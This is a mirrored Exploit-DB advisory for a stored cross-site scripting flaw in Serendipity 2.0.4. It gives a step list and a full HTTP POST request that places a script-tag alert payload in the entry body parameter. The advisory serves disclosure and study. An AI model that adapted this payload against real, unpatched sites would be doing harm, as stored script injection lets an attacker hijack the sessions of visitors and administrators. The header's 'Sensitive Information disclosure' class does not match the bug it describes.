bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/40650.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

70 lines
No EOL
2.2 KiB
Text
Raw Blame History

========================================
Title: Serendipity-2.0.4 (latest version) - Stored Cross Site Scripting
Application: Serendipity
Class: Sensitive Information disclosure
Versions Affected: <= latest version
Vendor URL: http://docs.s9y.org/
Software URL: http://docs.s9y.org/downloads.html
Bugs: Persistent Cross Site Scripting
Date of found: 29.10.2016
Author: Besim
========================================
2.CREDIT
========================================
Those vulnerabilities was identified by Meryem AKDOĞAN and Besim ALTINOK
3. VERSIONS AFFECTED
========================================
<= latest version
4. TECHNICAL DETAILS & POC
========================================
Stored Cross Site Scripting (No Admin Required)
========================================
1) Editor login panel
2) User click 'New Entry'
3) Attacker(normal user) enter xss payload to 'Entry Body' input
4) Vulnerability Parameter and Payload : &body=<Script>alert('Meryem ExploitDB')</Script>
### HTTP Request ###
POST /serendipity/serendipity_admin.php? HTTP/1.1
Host: site_name
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site_name/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new
Cookie: ---
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 762
- POST DATA
serendipity[action]=admin
&serendipity[adminModule]=entries
&serendipity[adminAction]=save
&serendipity[id]=
&serendipity[timestamp]=1477314176
&serendipity[preview]=false
&serendipity[token]=324fa32a404e03de978d9a18f86a3338
&serendipity[title]=New Page
&serendipity[body]=<Script>alert('Meryem ExploitDB')</Script>
&serendipity[extended]=
&serendipity[chk_timestamp]=1477314176
&serendipity[new_timestamp]=2016-10-24 15:02
&serendipity[isdraft]=false
&serendipity[allow_comments]=true
&serendipity[had_categories]=1
&serendipity[propertyform]=true
&serendipity[properties][access]=public
&ignore_password=
&serendipity[properties][entrypassword]=
&serendipity[change_author]=4
Reference in a new issue View git blame Copy permalink